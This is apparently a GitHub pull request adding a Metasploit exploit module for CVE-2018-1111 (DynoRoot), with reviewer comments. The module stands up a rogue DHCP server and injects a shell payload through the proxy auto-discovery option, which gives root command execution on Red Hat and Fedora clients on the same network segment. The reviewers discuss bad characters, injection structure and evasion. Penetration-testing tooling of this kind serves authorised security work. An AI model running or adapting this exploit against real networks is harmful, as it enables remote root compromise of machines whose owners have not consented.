Add CVE-2018-1111 exploit #10059
Changes from 3 commits
164f3ef
f1b9088
8f02423
35ee1b5
0951aca
599979b
1efa5c4
6d0c6a7
b0f5566
4bf259e
d9d2263
f2549a1
c665a32
93e9c96
@@ -0,0 +1,75 @@ | ||
## | ||
# This module requires Metasploit: http://metasploit.com/download | ||
# Current source: https://github.com/rapid7/metasploit-framework | ||
## | ||
|
||
require 'rex/proto/dhcp' | ||
Already required in the mixin.
Removed. Good catch!
||
|
||
class MetasploitModule < Msf::Exploit::Remote | ||
Rank = ExcellentRanking | ||
|
||
include Msf::Exploit::Remote::DHCPServer | ||
|
||
def initialize(info = {}) | ||
super(update_info(info, | ||
'Name' => 'DHCP Client Command Injection (DynoRoot)', | ||
'Description' => %q{ | ||
This module exploits the DynoRoot vulnerability, a flaw in how the | ||
NetworkManager integration script included in the DHCP client in | ||
Red Hat Enterprise Linux 6 and 7, Fedora 28, and earlier | ||
processes DHCP options. A malicious DHCP server, or an attacker on | ||
the local network able to spoof DHCP responses, could use this flaw | ||
to execute arbitrary commands with root privileges on systems using | ||
NetworkManager and configured to obtain network configuration using | ||
the DHCP protocol. | ||
}, | ||
'Author' => | ||
[ | ||
'Felix Wilhelm', # Vulnerability discovery | ||
'Kevin Kirsche <d3c3pt10n[AT]deceiveyour.team>' # Metasploit module | ||
], | ||
'License' => MSF_LICENSE, | ||
'Platform' => ['unix'], | ||
'Arch' => ARCH_CMD, | ||
You can add a
Fixed
||
'References' => | ||
Feel free to include your own PoC in this array. :)
I'd add an
Added
||
[ | ||
['CVE', '2018-1111'], | ||
['URL', 'https://twitter.com/_fel1x/status/996388421273882626?lang=en'], | ||
['URL', 'https://access.redhat.com/security/vulnerabilities/3442151'], | ||
['URL', 'https://dynoroot.ninja/'], | ||
['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2018-1111'], | ||
['URL', 'https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1111'] | ||
], | ||
'Payload' => | ||
{ | ||
# 255 for a domain name, minus some room for encoding | ||
'Space' => 200, | ||
I'd have to check the RFC(s), but does this still apply to options?
Based on RFC 2132, it seems like it does not.
Cool, didn't think so. Phew!
||
'DisableNops' => true, | ||
Speaking of space, I'm pretty sure this doesn't apply. Nothing to pad with NOPs. This thing doesn't even need NOPs.
Removed
||
'Compat' => | ||
I'd remove this hash altogether.
Removed this for
||
{ | ||
'PayloadType' => 'cmd', | ||
} | ||
}, | ||
'Targets' => [ [ 'Automatic Target', { }] ], | ||
'DefaultTarget' => 0, | ||
'DisclosureDate' => 'May 15 2018' | ||
)) | ||
|
||
deregister_options('DOMAINNAME', 'HOSTNAME', 'URL') | ||
Might be more to deregister here, such as any PXE options.
I'll remove FILENAME, which is related to PXE; I don't know that any of the others like DHCPIP start and end, BROADCAST, ROUTER, etc. are related to PXE.
Removed FILENAME; the others didn't seem like they were related to PXE in show options or show advanced.
Cool, thanks.
||
end | ||
|
||
def exploit | ||
hash = datastore.copy | ||
start_service(hash) | ||
@dhcp.set_option(proxy_auto_discovery: "x'&#{payload.encoded} #") | ||
Feels like you'd have some badchars from the injection. Would be worthwhile to perform badchar analysis and then update
Do you have any suggestions for how to perform that analysis? Unlike a buffer overflow, where I can investigate the registers, I don't have a good sense of how I'd do that with a command injection like this.
I'd start by looking at my injection and eliminating as many shell metacharacters or otherwise "breaking" characters as I can. Then I'd encode away the remaining ones, escape them, quote them, comment them out, or match them. Then I'd verify with
It really depends on the vuln, the environment, and the payload. Hope this helps.
I didn't dig into this vuln deeply yet, but judging by the injection used here, you shouldn't have to worry about too many badchars. It appears a string is being completed (matched quotes), the previous command backgrounded, the payload injected, and everything else commented out. It's a tried-and-true technique. You can probably randomize the
Another thing to watch out for is if you have badchars in the protocol or otherwise over the wire. Sometimes your injection can look solid from the software side but get messed up on the networking side.
Lastly, you may want to account for software or network protections. Something like a WAF would have to be evaded. I don't think that's much of a concern here.
Good bot.
Added a randomization on the
It's almost certainly not capped at one byte either. Might want to use a longer random-length random string.
I was under the impression that
Edit: Apparently space is no longer a concern, in which case:
A few different manual tests I've been doing to see if some shell functionality does or doesn't work:
Worked, and felt relatively contrived in their design, trying to hit many different types of command characters
||
|
||
begin | ||
while @dhcp.thread.alive? | ||
sleep 2 | ||
end | ||
ensure | ||
stop_service | ||
end | ||
end | ||
end | ||
|
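Review bot: the diff adds the module file but no accompanying module documentation, and `exploit` never returns on its own: it spins in `while @dhcp.thread.alive? ... sleep 2` and only reaches `stop_service` in the `ensure` once the service thread exits or the job is interrupted. That lifecycle (a listening DHCP server that answers whatever client on the segment asks, rather than a single-target exploit, and no `check` method) belongs in the module description or a docs file so operators know what they are starting and how it ends. Minor: `require 'rex/proto/dhcp'` duplicates the mixin's own require, as noted above, and `'DisableNops'` together with the `'Compat'` hash has no effect for an `ARCH_CMD` command payload, so both can go.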
https
Fixed, good eye!